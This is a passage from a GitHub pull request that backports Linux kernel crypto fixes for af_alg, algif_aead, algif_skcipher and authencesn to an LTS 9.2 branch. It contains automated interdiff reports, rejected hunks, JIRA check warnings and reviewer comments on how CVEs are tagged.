+	struct alg_sock *pask = alg_sk(psk);
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int i, as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
@@ -210,7 +184,7 @@
 	 */
 
 	/* Use the RX SGL as source (and destination) for crypto op. */
-	rsgl_src = areq->first_rsgl.sgl.sg;
+	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
 	if (ctx->enc) {
 		/*
@@ -223,10 +197,8 @@
 		 *	    v	   v
 		 * RX SGL: AAD || PT || Tag
 		 */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, processed);
-		if (err)
-			goto free;
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
+			      processed);
 		af_alg_pull_tsgl(sk, processed, NULL, 0);
 	} else {
 		/*
@@ -240,11 +212,8 @@
 		 * RX SGL: AAD || CT ----+
 		 */
 
-		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, outlen);
-		if (err)
-			goto free;
+		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
 
 		/* Create TX SGL for tag and chain it to RX SGL. */
 		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
@@ -267,10 +236,10 @@
 		if (usedpages) {
 			/* RX SGL present */
 			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+			struct scatterlist *sg = sgl_prev->sgt.sgl;
 
-			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
-			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
-				 areq->tsgl);
+			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
+			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
 		} else
 			/* no RX SGL present (e.g. authentication only) */
 			rsgl_src = areq->tsgl;
@@ -279,5 +248,5 @@
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
@@ -478,4 +447,4 @@
-	struct crypto_aead *tfm = aeadc->aead;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int ivlen = crypto_aead_ivsize(tfm);
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -310,7 +359,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct crypto_skcipher *tfm = pask->private;
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
 	sock_kzfree_s(sk, ctx->iv, crypto_skcipher_ivsize(tfm));
-	sock_kfree_s(sk, ctx, ctx->len);
-	af_alg_release_parent(sk);
+	if (ctx->state)
+		sock_kzfree_s(sk, ctx->state, crypto_skcipher_statesize(tfm));
  • ⚠️ PR commit 483ef4605b9 (crypto: af_alg - limit RX SG extraction by receive buffer budget) → upstream 8eceab19eba9
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -82,14 +82,8 @@
 	 * If more buffers are to be expected to be processed, process only
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used) {
-		if (len < bs) {
-			err = -EINVAL;
-			goto free;
-		}
-
+	if (ctx->more || len < ctx->used)
 		len -= len % bs;
-	}
 
 	/*
 	 * Create a per request TX SGL for this request which tracks the

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -130,6 +130,11 @@
 	 * full block size buffers.
 	 */
 	if (ctx->more || len < ctx->used) {
+		if (len < bs) {
+			err = -EINVAL;
+			goto free;
+		}
+
 		len -= len % bs;
 		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
 	}

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -79,7 +79,6 @@
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used)
+	if (ctx->more || len < ctx->used) {
 		len -= len % bs;
-
-	/*
-	 * Create a per request TX SGL for this request which tracks the
+		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
+	}
  • ⚠️ PR commit 98f9fc15d1d (crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec) → upstream 2397e9264676
    Differences found:
================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -275,6 +253,6 @@
 	u32 tmp[2];
 	int err;
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
+	if (req->src != dst)
  • ⚠️ PR commit 3fed07cbcfc (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) → upstream e02494114ebf
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -164,10 +164,7 @@
 	authenc_esn_request_complete(areq, err);
 }
 
-static int crypto_authenc_esn_copy_sg(struct aead_request *req,
-				      struct scatterlist *src,
-				      struct scatterlist *dst,
-				      unsigned int len)
+static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
 	struct crypto_authenc_esn_ctx *ctx = crypto_aead_ctx(authenc_esn);
@@ -176,16 +173,11 @@
 	skcipher_request_set_sync_tfm(skreq, ctx->null);
 	skcipher_request_set_callback(skreq, aead_request_flags(req),
 				      NULL, NULL);
-	skcipher_request_set_crypt(skreq, src, dst, len, NULL);
+	skcipher_request_set_crypt(skreq, req->src, req->dst, len, NULL);
 
 	return crypto_skcipher_encrypt(skreq);
 }
 
-static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
-{
-	return crypto_authenc_esn_copy_sg(req, req->src, req->dst, len);
-}
-
 static int crypto_authenc_esn_encrypt(struct aead_request *req)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
@@ -245,7 +237,6 @@
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-	int err;
 
 	if (!authsize)
 		goto decrypt;
@@ -255,11 +246,8 @@
 		scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);
 		scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0);
 		scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);
-	} else {
-		err = crypto_authenc_esn_copy(req, assoclen);
-		if (err)
-			return err;
-	}
+	} else
+		memcpy_sglist(dst, src, assoclen);
 
 	if (crypto_memneq(ihash, ohash, authsize))
 		return -EBADMSG;
@@ -308,8 +296,13 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	if (!authsize)
-		goto tail;
+	cryptlen -= authsize;
+
+	if (req->src != dst) {
+		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
+		if (err)
+			return err;
+	}
 
 	cryptlen -= authsize;
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
@@ -327,10 +320,7 @@
 
 		src = scatterwalk_ffwd(areq_ctx->src, src, 8);
 		dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
-		err = crypto_authenc_esn_copy_sg(req, src, dst,
-						 assoclen + cryptlen - 8);
-		if (err)
-			return err;
+		memcpy_sglist(dst, src, assoclen + cryptlen - 8);
 		dst = req->dst;
 	}
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -268,10 +274,8 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	cryptlen -= authsize;
-
-	if (req->src != dst)
-		memcpy_sglist(dst, req->src, assoclen + cryptlen);
+	if (!authsize)
+		goto tail;
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -225,10 +204,9 @@
-			      crypto_ahash_alignmask(auth) + 1);
+	u8 *ohash = areq_ctx->tail;
 	unsigned int cryptlen = req->cryptlen - authsize;
 	unsigned int assoclen = req->assoclen;
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-
 	if (!authsize)
 		goto decrypt;
 
@@ -281,11 +254,8 @@
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
-		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
-		if (err)
-			return err;
-	}
+	if (req->src != dst)
+		memcpy_sglist(dst, req->src, assoclen + cryptlen);
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);
  • ⚠️ PR commit 51da7d5f804 (crypto: algif_aead - snapshot IV for async AEAD requests) → upstream 5aa58c3a572b
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -220,7 +220,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, iv);
+			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -193,7 +199,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -69,5 +69,5 @@
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_sync_skcipher *null_tfm = aeadc->null_tfm;
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -208,7 +184,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

This is an automated interdiff check for backported commits.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

JIRA PR Check Results

3 commit(s) with issues found:

Commit 98f9fc15d1df

Summary: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec

⚠️ Warnings:

  • VULN-175567: No time logged - please log time manually

Commit 4c8b8792e1ae

Summary: crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl

⚠️ Warnings:

  • VULN-182989: No time logged - please log time manually

Commit 483ef4605b9b

Summary: crypto: af_alg - limit RX SG extraction by receive buffer budget

⚠️ Warnings:

  • VULN-182989: No time logged - please log time manually

Summary: Checked 10 commit(s) total.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

Validation checks completed successfully View full results: https://github.com/ctrliq/kernel-src-tree/actions/runs/25199053980

@PlaidCat PlaidCat changed the title [ciqlts9_2] Multiple patches tested (10 commits) [LTS 9.2] CVE-2026-23060, CVE-2026-31431, CVE-2026-31677 May 1, 2026
@PlaidCat PlaidCat self-assigned this May 1, 2026
@PlaidCat PlaidCat requested a review from a team May 1, 2026 02:22
@roxanan1996

Copy link
Copy Markdown
Contributor

🔍 Upstream Linux Kernel Commit Check

* ❌ PR commit `3fed07cbcfc (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption)` references `CVE-2026-31431` but
  upstream commit `e02494114ebf` has no CVE assigned

This is an automated message from the kernel commit checker workflow.

Yeah, this is not a CVE. It shold have been tagged with cve-bf CVE-2026-31431. Since we have this in 9.6 and 9.4, I won't change it. No big deal.

@roxanan1996 roxanan1996 merged commit a1fac0a into ciqlts9_2 May 1, 2026
5 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

created-by-kernelci Tag PRs that were automatically created when a user branch was pushed to the repo (kernelCI)

Development

Successfully merging this pull request may close these issues.

3 participants